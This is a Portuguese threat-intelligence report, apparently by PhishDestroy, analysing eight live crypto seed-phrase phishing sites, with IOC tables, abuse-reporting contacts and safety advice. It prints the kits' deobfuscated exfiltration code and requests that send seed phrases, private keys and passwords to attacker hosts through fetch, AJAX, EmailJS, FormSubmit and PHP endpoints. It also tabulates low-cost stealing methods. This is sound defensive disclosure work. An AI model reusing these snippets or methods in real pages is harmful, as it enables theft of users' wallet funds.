Anatomia do phishing relacionado a criptomoedas:
8 Ataques Reais Analisados
Interceptamos tráfego de phishing em tempo real, realizamos engenharia reversa em cinco programas de roubo de frases-semente e rastreamos os dados roubados até bots do Telegram, contas do EmailJS e back-ends de Phishing-as-a-Service.

O que descobrimos
Todos os dias, milhares de usuários de criptomoedas perdem seus fundos para sites de phishing que parecem idênticos aos serviços legítimos de carteiras. Mas o que acontece atrás de O botão falso “Connect Wallet”? Para onde vai, na verdade, sua frase-semente?
Interceptamos o tráfego HTTP em tempo real de cinco sites de phishing ativos, baixamos seu código-fonte completo e rastreamos cada ponto de exfiltração de dados até seu destino final. Esta investigação revela toda a anatomia do crypto-phishing moderno — desde os truques de engenharia social que levam você a digitar sua frase-semente até o bot do Telegram que a envia ao invasor em tempo real.
Todas as frases-semente apresentadas neste artigo são dados de teste gerados aleatoriamente. Nenhuma informação de acesso real foi comprometida durante esta investigação. Todos os sites foram denunciados aos respectivos provedores de hospedagem e departamentos de combate a abusos.
O Padrão Universal de Ataque
Apesar das diferenças na identidade visual e nos back-ends, todos os 8 sites de phishing seguem o exatamente o mesmo funil psicológico:
A observação fundamental: a animação “Conectando...” é sempre programado para falhar. No código-fonte do Site nº 4, encontramos const success = false — não há nenhuma tentativa de conexão com a carteira. Todo o fluxo existe exclusivamente para direcionar as vítimas ao formulário “Conectar manualmente”.

Os 8 sites: análise detalhada
Falsificação de identidade
Um “protocolo descentralizado” fictício para validação de carteiras. Utiliza tickers de preços em tempo real do CryptoCompare e links para exploradores de blockchain reais (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) para conferir credibilidade. A página inicial exibe mais de 100 logotipos de carteiras e um processo de “validação” em três etapas.
A cadeia dupla de exfiltração
O backend mais sofisticado dos cinco — todas as credenciais roubadas são enviadas por meio de dois canais independentes simultaneamente:
Victim submits seed phrase
|
+--> Channel 1: axios POST --> Express.js on Render.com
| |
| +--> Telegram Bot API --> @metatech2 (instant DM)
|
+--> Channel 2: fetch POST --> EmailJS API
|
+--> Bestgrace309@gmail.com (email backup) Conclusões da OSINT
| Indicador | Valor |
|---|---|
| E-mail de golpista | Bestgrace309@gmail.com |
| Bot do Telegram | @DewdropsTG_bot (ID: 7567323692) |
| Destinatário do Telegram | @metatech2 (ID do chat: 7350941887) |
| Back-end | emailjs-backend-ovtg.onrender.com |
| Serviço EmailJS | service_d5qigxs / template_7bqxeaa |
| Domínio oculto | layerschain.in (proveniente da ofuscação de e-mail do CF) |
| Mensagens enviadas | 1.824+ (a partir do `message_id` do Telegram) |
| Idade do domínio | 2 dias (TLS: 25 de março de 2026) |
O e-mail do invasor foi encontrado em um Comentário em JavaScript dentro config.js: // Bestgrace309@gmail.com. Eles se esqueceram de removê-lo antes da implantação. Além disso, o backend do relé do Telegram é totalmente aberto — sem autenticação, sem limitação de taxa. Ao decodificar o Cloudflare data-cfemail Além da ofuscação no HTML, também descobrimos um e-mail oculto: support@layerschain.in, conectando-se à infraestrutura de hospedagem da Índia e da África do Sul.
Falsificação de identidade
Uma reprodução perfeita, pixel por pixel, da realidade Aqualibre (AQLA) página de migração de tokens. O código HTML contém uma tag de metadados que revela a fonte: data-scrapbook-source="https://token.aqla.app/migration", com data de 19 de novembro de 2024.
A abordagem “zero código”
Esse invasor requer sem código do lado do servidor. O formulário envia os dados diretamente para Não estático — um backend de formulário legítimo para sites estáticos. Cada envio é encaminhado para o e-mail do golpista. O e-mail do atacante é nunca aparece no código-fonte.
<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
<textarea name="phrase"></textarea>
<input name="private-key" />
<textarea name="keystore-json"></textarea>
<input name="password" />
</form>
Cloudflare Pages: gratuito. Formulários não estáticos: gratuito. Sem domínios adquiridos. Sem servidores alugados. Custo total da infraestrutura: zero dólares.
Falsificação de identidade
O subdomínio contém "safpal" — um erro ortográfico deliberado de SafePal, uma carteira de hardware popular. O site se apresenta como “Blockchain Wallet Rectification”, com 26 categorias de notícias falsas. Utiliza o Typed.js para animar os nomes das cadeias (Ethereum, BSC, Polygon...) e um ticker do LiveCoinWatch para dar credibilidade.
O mesmo kit, o mesmo operador?
Utiliza o exatamente o mesmo modelo de phishing como Local nº 2:
idêntico connect.html, idêntico wallets.html com mais de 60 logotipos, no mesmo backend do Un-static (ID de formulário diferente — 6f1b82c3...da9943af). O fato de o kit ser idêntico sugere fortemente que um operador responsável por ambos os locais.
Erros no código: “Privay Policy” (falta um ‘c’), “seperated” (deveria ser “separated”), “Kestore” (falta um ‘y’). O campo de senha usa type="text" em vez de type="password".
Falsificação de identidade
Um clone quase perfeito do Rede Flare portal — uma blockchain EVM de Camada 1 de verdade, com os protocolos FTSO e Data Connector. Reproduz mais de 30 parceiros do ecossistema, a navegação e a identidade visual. Favicons carregados a partir de um domínio typosquat: portal.flaremainet.com (falta um “n” em “mainnet”).
Redundância dupla do EmailJS
O único site que usa duas contas separadas do EmailJS simultaneamente para redundância contra remoções:
// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4
// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
data: { service_id: 'service_isy47de',
template_id: 'template_dkk4d1b',
user_id: 'JsVEgXVcaSTro1etu' }
}) Assunto do e-mail para cada roubo: "New Wallet Details from Flare".
O HTML contém Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Proteção PPC do Lunio, e um Pixel do Twitter/X Ads. O invasor está executando publicidade paga para direcionar as vítimas ao site de phishing e filtrar os cliques dos bots. Isso não é um hobby — é uma operação financiada, com análises e investimento em publicidade.

Falsificação de identidade
Um serviço genérico de “COIN NODE” / “Wallet Fix” (sem marca específica). Direitos autorais “Wallet Fix 2022” — este modelo de kit tem pelo menos 4 anos. Imagens hospedadas em pumpeth.com (WordPress na AWS).
Phishing como Serviço
A arquitetura de back-end mais preocupante: uma API multilocatária baseada em UUID:
POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data
wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+... Cada golpista recebe seu próprio endpoint UUID. Um operador central mantém a API, acompanha as campanhas e, possivelmente, fica com uma parte dos fundos roubados. Isso é roubo industrializado de criptomoedas — um modelo de “phishing como serviço”.
Infraestrutura relacionada (praticamente inativa)
| Domínio | Função | Status |
|---|---|---|
| api.pulseresolve.com | API de exfiltração | NXDOMAIN |
| walletissuesfix.net | Hospedagem de favicons | NXDOMAIN |
| syncwallet.online | Apresentador do Logo | NXDOMAIN |
| pumpeth.com | CDN de imagens | Em produção (AWS) |
O backend está inoperante, mas o O front-end ainda está no ar on Cloudflare Pages. Se o invasor fizer um novo registro pulseresolve.com, o site volta a funcionar imediatamente.
Falsificação de identidade
A operação em duas frentes: um “Centro de Suporte” genérico em wallet-support-39n.pages.dev com 15 categorias de emissão falsas e 39 marcas de carteiras, além de um Clone da experiência de integração do Ledger com precisão de pixel em ledger-recovery.support hospedado no Replit — incluindo seleção do modelo do dispositivo, configuração do PIN e uma tabela com a frase-semente de 24 palavras com autocompletar BIP39 de verdade.
Backend C2 do Anti-Scanner
A página de suporte da carteira envia os dados roubados para api.uranustoken.org/log — um servidor C2 personalizado com nginx/Ubuntu atrás do Cloudflare. O back-end desvia intencionalmente todas as solicitações GET (retorna o erro 522 – tempo limite esgotado), respondendo apenas a solicitações POST. Isso significa que os verificadores de URL, os rastreadores do Google Safe Browsing e os pesquisadores de segurança que enviam solicitações GET para o endpoint não veem nada — o C2 parece inativo.
// config.js — C2 config exposed in plaintext
const config = {
serverURL: "https://api.uranustoken.org",
allowedWallets: ["phantom","solfare","metamask","trustwallet",
"coinbasewallet","ledger","trezor","okx","sui","backpack",
"tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;
// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
fetch(serverURL + "/log", {
method: "POST",
headers: {"Content-Type": "application/json"},
body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
})
} O clone do Ledger executa um backend Express.js separado no próprio Replit: POST /api/recovery-phrase coletando {deviceId, pin, phrase}. Ele retorna 400 {"error":"Invalid data provided"} em caso de entrada inválida — confirmando que o backend está em funcionamento e em constante validação dados roubados.
Conclusões da OSINT
| Indicador | Valor |
|---|---|
| Front-end (Carteira) | wallet-support-39n.pages.dev |
| Front-end (Ledger) | ledger-recovery.support (34.111.179.208) |
| Backend C2 | api.uranustoken.org → nginx/1.24.0 Ubuntu |
| IPs C2 | 104.21.60.163 / 172.67.198.35 (Cloudflare) |
| Replit Verify | a43d3852-5304-47af-a61b-f0f6f3912736 |
| Secretário | Name.com (ledger-recovery.support) |
| Implantado | 9 de janeiro de 2026 (cabeçalho “Última modificação”) |
| Pilha de tecnologias | React + Vite + Tailwind v4.1 + Framer Motion |
O pacote JS de 466 KB contém o lista completa de palavras do BIP39 para o preenchimento automático em tempo real, 67 referências a “frase-senha” e 39 a “mnemônico”. O clone do Ledger conduz as vítimas pelo mesmo fluxo de integração de um dispositivo Ledger original — a página de phishing mais convincente de toda esta investigação. O apiKey O campo na configuração sugere um arquitetura PhaaS multilocatária.
Falsificação de identidade
Uma “Plataforma de Lançamento Descentralizada” genérica com 21 categorias de iscas (Staking, Migração, KYC, Sorteio, Resgate de recompensas, Recuperação de ativos, Pré-venda, Cunhagem de NFTs, Contas bloqueadas...) e Mais de 70 marcas de carteiras — uma das listas de carteiras mais completas que encontramos. O erro ortográfico revelador “Sychronize” (faltando o ‘n’) denuncia a falsificação.
The FormSubmit Pipeline
Usos FormSubmit.co — um serviço legítimo de envio de formulários por e-mail. O hash do endpoint a2cf4131f1a5d39453c7c183df96f86f é o MD5 do endereço de e-mail do golpista. Realizamos um ataque de força bruta em centenas de padrões de e-mail no Gmail, Yahoo, Hotmail, ProtonMail, Yandex e Mail.ru — não foi encontrado nenhum resultado. O golpista usa um endereço de e-mail incomum ou gerado aleatoriamente.
// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
method: "POST",
dataType: "JSON",
data: {
dappWord: seedPhrase, // THE STOLEN SEED PHRASE
dappName: walletName, // Which wallet was selected
linkName: "DAPP DECENTRALIZED" // Campaign identifier
}
}); Conclusões da OSINT
| Indicador | Valor |
|---|---|
| Domínio | mainnetvalidationapp.pages.dev |
| Hash de envio de formulário | a2cf4131f1a5d39453c7c183df96f86f |
| ID da campanha | DAPP DESCENTRALIZADO |
| Kit FontAwesome | bdc3291137 (kit nº 112310842, versão gratuita 6.7.2) |
| jQuery | 3.2.1 + 3.5.1 carregados simultaneamente |
| Bootstrap | CSS 5.2.2 + JS 5.3.0-alpha1 (incompatibilidade) |
Kit FontAwesome bdc3291137 — O FontAwesome consegue identificar o titular da conta associado a esse ID de kit. A tag da campanha DAPP DECENTRALIZED pode aparecer em outros sites de phishing que utilizem o mesmo hash do FormSubmit. Após roubar a frase-semente, um código QR falso e código de referência aleatório de 7 caracteres são exibidas as seguintes mensagens: “Entre em contato com o administrador com seu código de referência exclusivo” — deixando as vítimas à espera, em vez de investigar o caso.
Falsificação de identidade
Desconhecido — tanto o front-end quanto o back-end estão fora do ar. Com base na estrutura da carga útil, tratava-se de um programa para roubar a frase-semente de uma carteira de criptomoedas. O Bucket público do Cloudflare R2 (armazenamento de objetos, não o Pages) é um vetor de phishing bem documentado com mais de 5.000 páginas maliciosas identificadas e um aumento de 61 vezes no tráfego relatado pela Netskope.
A configuração do “script kiddie”
O mais operação primitiva nesta coleção. As frases-semente são enviadas palavra por palavra para um script PHP em execução em um computador doméstico ou VPS por meio de um serviço gratuito de DNS dinâmico:
POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded
pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
+%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
+%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
+%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access Conclusões da OSINT
| Indicador | Valor |
|---|---|
| Front-end | pub-519769e9eb634616b1746c2018641d56.r2.dev [OFFLINE] |
| Back-end | mercifuljigga4real123.publicvm.com [NXDOMAIN] |
| ID do balde R2 | 519769e9eb634616b1746c2018641d56 |
| Provedor de DDNS | DNSExit.com / Netdorm, Inc. (Cincinnati, OH) |
| DNS NS | ns10–13.dnsexit.com |
| Nome de usuário | mercifuljigga4real123 |
"Merciful" + "jigga" (apelido de Jay-Z) + "4real" + "123" — um apelido claramente pessoal que sugere afinidade com a cultura do hip-hop. Não encontrado em qualquer plataforma indexada: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch ou Steam. Provavelmente ativo no Discord, no Telegram ou em plataformas de jogos com esse nome ou variações semelhantes. O nome do arquivo fuc.php combina com o estilo irreverente da alça.
7 maneiras de roubar sua frase-semente

| Método | Locais | Como funciona | Velocidade | Custo |
|---|---|---|---|---|
| Bot do Telegram | #1 | O Express.js no Render.com redireciona para a API do Bot. O golpista recebe uma mensagem direta instantânea com as credenciais. | Em tempo real | $0 |
| EmailJS | #1, #4 | O JavaScript do lado do cliente envia diretamente para a API do EmailJS, que, por sua vez, encaminha a mensagem para o e-mail do golpista. | ~1 min | $0 |
| Formulários não estáticos | #2, #3 | Formulário HTML padrão com envio do tipo POST para um serviço de formulários legítimo que encaminha os envios por e-mail. | ~1 min | $0 |
| FormSubmit.co | #7 | jQuery AJAX para FormSubmit.co. Endereço de e-mail oculto por um hash MD5. Campanha marcada como “DAPP DECENTRALIZED”. | ~1 min | $0 |
| API C2 personalizada | #6 | O React SPA envia as solicitações para a API do nginx/Express, que está atrás do Cloudflare. Rejeita solicitações GET (522) para evitar scanners. Responde apenas ao POST. | Em tempo real | ~$5/mês |
| PHP + DDNS | #8 | Script em PHP em um computador doméstico por meio de um serviço gratuito de DNS dinâmico (publicvm.com). A frase-semente é enviada palavra por palavra. | Em tempo real | $0 |
| API do PhaaS | #5 | API multilocatária baseada em UUID. Um operador central gerencia o back-end, enquanto os golpistas alugam endpoints. | Em tempo real | Desconhecido |
7 sinais de alerta que revelam qualquer site de phishing
Se você vir qualquer Se for o caso, feche a aba imediatamente:
As conexões com carteiras reais utilizam o protocolo WalletConnect ou extensões de navegador. Elas nunca exibem um erro do tipo “Falha na conexão” que solicite que você digite sua frase-semente.
Cada ícone de carteira leva ao mesmo formulário. Um serviço de verdade integraria o SDK específico de cada carteira.
O falso “Erro 503” ou “Erro desconhecido” exibido após o envio é intencional. Seus dados já foram roubados — o erro serve para induzi-lo a tentar novamente com outra carteira.
Todos os 5 sites abusam do plano gratuito do Cloudflare Pages. Não é necessária verificação de identidade. Os casos de abuso para fins de phishing no Cloudflare Pages aumentaram 198% em 2025.
Nenhum serviço legítimo precisa dos três tipos de credenciais. Esse formulário com três abas é uma característica típica de um kit de phishing.
Nenhum desses sites carrega ethers.js, web3.js, nem fazem chamadas RPC. São formulários HTML puros que fingem ser dApps.
Hospedagem gratuita + serviços de formulários gratuitos + mensagens gratuitas = uma operação completa de phishing por US$ 0. Se o site não tiver um domínio válido, desconfie.
Tabela completa do IOC
Para equipes de segurança, plataformas de inteligência contra ameaças e denunciantes de abusos:
Domínios e Infraestrutura
| Domínio | Tipo | Status |
|---|---|---|
| networklayers.pages.dev | Interface de phishing | Ao vivo |
| token-aqla.pages.dev | Interface de phishing | Ao vivo |
| antiresolve-mysafpalnode.pages.dev | Interface de phishing | Ao vivo |
| flaremainnet.pages.dev | Interface de phishing | Ao vivo |
| swiftauthapps.pages.dev | Interface de phishing | Ao vivo |
| emailjs-backend-ovtg.onrender.com | Backend do relé TG | Ao vivo |
| portal.flaremainet.com | Ativos de typosquat | Desconhecido |
| layerschain.in | Domínio relacionado | DNS fora do ar |
| api.pulseresolve.com | Back-end do PhaaS | NXDOMAIN |
| walletissuesfix.net | Hospedagem de ativos | NXDOMAIN |
| syncwallet.online | Apresentador do Logo | NXDOMAIN |
| pumpeth.com | CDN de imagens | Em produção (AWS) |
| wallet-support-39n.pages.dev | Interface de phishing | Ao vivo |
| ledger-recovery.support | Phishing no Ledger (Replit) | Ao vivo |
| api.uranustoken.org | Back-end C2 (nginx/Ubuntu) | Ao vivo |
| uranustoken.org | Domínio raiz | 404 |
| mainnetvalidationapp.pages.dev | Interface de phishing | Ao vivo |
| pub-519769e9eb634616b1746c2018641d56.r2.dev | Phishing (categoria R2) | Offline |
| mercifuljigga4real123.publicvm.com | Back-end em PHP (DDNS) | NXDOMAIN |
Contas e identificadores
| Tipo | Valor | Site |
|---|---|---|
| Bestgrace309@gmail.com | #1 | |
| E-mail (oculto) | support@layerschain.in | #1 |
| Bot do Telegram | @DewdropsTG_bot (7567323692) | #1 |
| Usuário do Telegram | @metatech2 (7350941887) | #1 |
| EmailJS #1 | service_d5qigxs / I-7q0Bs-ilK3rFcWj | #1 |
| EmailJS #2 | service_6dt5h1k / Sza6lhzA9hKHrm1k4 | #4 |
| EmailJS #3 | service_isy47de / JsVEgXVcaSTro1etu | #4 |
| Formulário não estático | c78173e2d991...94c3f76 | #2 |
| Formulário não estático | 6f1b82c3ce55...da9943af | #3 |
| UUID do PhaaS | a26db20c-1dc4-4208-a60a-c2c3b22c02ef | #5 |
| GTM | GTM-WX2D2TR | #4 |
| MS Clarity | j4bllybjkp | #4 |
| Instância de renderização | rndr-id: ed83576e-b1b3-4c82 | #1 |
| Replit Verify | a43d3852-5304-47af-a61b-f0f6f3912736 | #6 |
| MD5 do envio do formulário | a2cf4131f1a5d39453c7c183df96f86f | #7 |
| Tag da campanha | DAPP DESCENTRALIZADO | #7 |
| Kit FontAwesome | bdc3291137 (kit nº 112310842) | #7 |
| ID do balde R2 | 519769e9eb634616b1746c2018641d56 | #8 |
| Nome de usuário/DDNS | mercifuljigga4real123 | #8 |
Onde denunciar casos de phishing relacionado a criptomoedas

| Serviço | O que relatar | Como |
|---|---|---|
| Cloudflare | 7 contas .pages.dev + 1 bucket R2 | abuse.cloudflare.com |
| Google Safe Browsing | Todos os URLs de phishing | Denunciar phishing |
| PhishTank | Todas as URLs da lista de bloqueios da comunidade | phishtank.org |
| EmailJS | 3 contas com uso indevido (IDs de serviço acima) | abuse@emailjs.com |
| Não estático | 2 pontos finais do formulário | Entre em contato pelo site un-static.com |
| Render.com | Back-end de retransmissão do Telegram | Exibir formulário de denúncia de abuso |
| Telegram | @DewdropsTG_bot + @metatech2 | telegram.org/support |
| Google (Gmail) | Bestgrace309@gmail.com | Denúncia de abuso no Google |
| Twitter/X | Conta de publicidade promovendo o Site nº 4 | Denúncia de abuso de anúncios do X |
| FormSubmit.co | Hash a2cf4131... (n.º 7) | Formulário de denúncia de abuso do FormSubmit |
| Replit | ledger-recovery.support (#6) | Denúncia de abuso no Replit |
| Name.com | Registrador do site ledger-recovery.support | Abuso no Name.com |
| DNSExit | mercifuljigga4real123.publicvm.com | Abuso no site dnsexit.com |
| FontAwesome | Kit bdc3291137 (n.º 7) | Uso indevido do FontAwesome |
| Chainabuse | Todas as campanhas de phishing | Chainabuse.com |
Como se proteger
Nenhum serviço legítimo jamais pedirá que você digite sua frase-semente em um site. As frases-semente só devem ser inseridas no software oficial da carteira durante a recuperação da carteira — nunca em sites de terceiros que ofereçam serviços de “validação”, “sincronização” ou “recuperação”.
Antes de conectar qualquer carteira:
- Verifique se a URL corresponde ao domínio oficial. Verifique os detalhes do certificado SSL.
- O WalletConnect original utiliza um código QR ou um link direto — nunca um formulário de frase-semente.
- Se a “conexão falhar” e você for solicitado a inserir suas credenciais manualmente — trata-se de phishing.
- Verifique URLs suspeitos em PhishTank ou VirusTotal antes de interagir.
- Use uma carteira de hardware — ela exige confirmação física para cada transação.
- Salve os URLs oficiais nos favoritos. Nunca clique em links de anúncios, mensagens diretas ou redes sociais.
A Taxonomia do Crypto-Phishing
Os ladrões de frases-semente são apenas uma categoria. Aqui está o panorama completo do phishing em criptomoedas — iremos adicionar análises detalhadas sobre cada tipo.
A Verdade Inconfortável
Custos para montar uma operação de phishing envolvendo criptomoedas $0 e leva menos de 30 minutos. Hospedagem gratuita, serviços de formulários gratuitos, bots de mensagens gratuitos. O invasor por trás do Site nº 1 já obteve credenciais de Mais de 1.824 vítimas. O local nº 4 está em funcionamento publicidade paga em grande escala. Isso não é brincadeira de amador — é uma indústria. A única defesa é a conscientização.
Ajude-nos a reagir
O PhishDestroy rastreia e denuncia sites de phishing relacionados a criptomoedas em tempo real. Se você se deparar com um site suspeito, denuncie-o para nós — vamos investigar e trabalhar para que ele seja retirado do ar.



